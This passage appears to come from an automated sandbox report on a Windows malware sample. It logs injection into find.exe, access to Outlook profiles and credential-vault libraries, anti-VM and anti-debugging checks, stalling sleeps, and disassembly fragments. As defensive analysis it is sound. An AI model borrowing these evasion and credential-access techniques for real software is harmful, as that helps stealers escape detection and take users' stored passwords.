                      Source: C:\Windows\SysWOW64\find.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: QsBdpe1gK5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: QsBdpe1gK5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: QsBdpe1gK5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: dAwj.pdbSHA256 source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: Binary string: find.pdb source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oPkpFmCiYVL.exe, 00000003.00000000.1767735711.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126367984.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: QsBdpe1gK5.exe, QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dAwj.pdb source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exeStatic PE information: 0xC8C08E34 [Wed Sep 23 04:55:16 2076 UTC]
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_0305EFB0 push esp; iretd 0_2_0305EFB1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073036C0 pushfd ; ret 0_2_073036CE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07302402 pushfd ; ret 0_2_07302417
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073014B8 pushfd ; ret 0_2_073014C6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07302E0F pushfd ; ret 0_2_07302E1E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_0730BB3A push ebx; ret 0_2_0730BB46
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07302860 pushfd ; ret 0_2_07302861
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E41721 push ds; ret 0_2_07E4172E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43578 push ebx; ret 0_2_07E43586
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E42400 push esp; ret 0_2_07E42402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4237B push edx; ret 0_2_07E42392
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E432B6 push ds; ret 0_2_07E432B7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43108 push ebx; ret 0_2_07E43116
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43EBF push esp; ret 0_2_07E43ECE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E41E5B push ds; ret 0_2_07E41E76
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E42DBC push edx; ret 0_2_07E42DC6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4397F push ds; ret 0_2_07E4398E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43951 push ds; ret 0_2_07E4395E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00416043 push ecx; iretd 2_2_00416091
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00403260 push eax; ret 2_2_00403262
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417A0F push edi; iretd 2_2_00417A1C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417A13 push edi; iretd 2_2_00417A1C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00409BF3 pushfd ; retf 2_2_00409C6C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004093F6 push esp; ret 2_2_004093FC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00409C57 pushfd ; retf 2_2_00409C6C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00413C75 push esp; iretd 2_2_00413D3E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00414C2E push cs; iretd 2_2_00414C2F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00413C83 push esp; iretd 2_2_00413D3E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004185A1 push eax; retf 2_2_004185A2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417EF3 push edi; ret 2_2_00417EFF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010C225F pushad ; ret 2_2_010C27F9
                      Source: QsBdpe1gK5.exeStatic PE information: section name: .text entropy: 7.8179183719331435
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: QsBdpe1gK5.exe PID: 7252, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 51B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 9670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: A670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: B880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113096E rdtsc 2_2_0113096E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 2212Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 7762Jump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\find.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe TID: 7272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep count: 2212 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep time: -4424000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep count: 7762 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep time: -15524000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep time: -80000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep time: -54000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep count: 45 > 30Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep time: -45000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008BC7D0 FindFirstFileW,FindNextFileW,FindClose,4_2_008BC7D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: oPkpFmCiYVL.exe, 00000008.00000002.4126861408.000000000113F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA a
                      Source: firefox.exe, 00000009.00000002.2143875145.0000016D0C92E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113096E rdtsc 2_2_0113096E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417993 LdrLoadDll,2_2_00417993
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A118 mov ecx, dword ptr fs:[00000030h]2_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A118 mov eax, dword ptr fs:[00000030h]2_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A118 mov eax, dword ptr fs:[00000030h]2_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A118 mov eax, dword ptr fs:[00000030h]2_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B0115 mov eax, dword ptr fs:[00000030h]2_2_011B0115
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov ecx, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov ecx, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov ecx, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov eax, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E10E mov ecx, dword ptr fs:[00000030h]2_2_0119E10E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01120124 mov eax, dword ptr fs:[00000030h]2_2_01120124
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01188158 mov eax, dword ptr fs:[00000030h]2_2_01188158
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC156 mov eax, dword ptr fs:[00000030h]2_2_010EC156
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6154 mov eax, dword ptr fs:[00000030h]2_2_010F6154
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6154 mov eax, dword ptr fs:[00000030h]2_2_010F6154
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov eax, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov eax, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov ecx, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov eax, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01184144 mov eax, dword ptr fs:[00000030h]2_2_01184144
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4164 mov eax, dword ptr fs:[00000030h]2_2_011C4164
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4164 mov eax, dword ptr fs:[00000030h]2_2_011C4164
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117019F mov eax, dword ptr fs:[00000030h]2_2_0117019F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117019F mov eax, dword ptr fs:[00000030h]2_2_0117019F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117019F mov eax, dword ptr fs:[00000030h]2_2_0117019F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117019F mov eax, dword ptr fs:[00000030h]2_2_0117019F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AC188 mov eax, dword ptr fs:[00000030h]2_2_011AC188
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AC188 mov eax, dword ptr fs:[00000030h]2_2_011AC188
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01130185 mov eax, dword ptr fs:[00000030h]2_2_01130185
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA197 mov eax, dword ptr fs:[00000030h]2_2_010EA197
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA197 mov eax, dword ptr fs:[00000030h]2_2_010EA197
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA197 mov eax, dword ptr fs:[00000030h]2_2_010EA197
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01194180 mov eax, dword ptr fs:[00000030h]2_2_01194180
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01194180 mov eax, dword ptr fs:[00000030h]2_2_01194180
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov eax, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov eax, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov eax, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E1D0 mov eax, dword ptr fs:[00000030h]2_2_0116E1D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B61C3 mov eax, dword ptr fs:[00000030h]2_2_011B61C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B61C3 mov eax, dword ptr fs:[00000030h]2_2_011B61C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011201F8 mov eax, dword ptr fs:[00000030h]2_2_011201F8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C61E5 mov eax, dword ptr fs:[00000030h]2_2_011C61E5
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E016 mov eax, dword ptr fs:[00000030h]2_2_0110E016
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01174000 mov ecx, dword ptr fs:[00000030h]2_2_01174000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
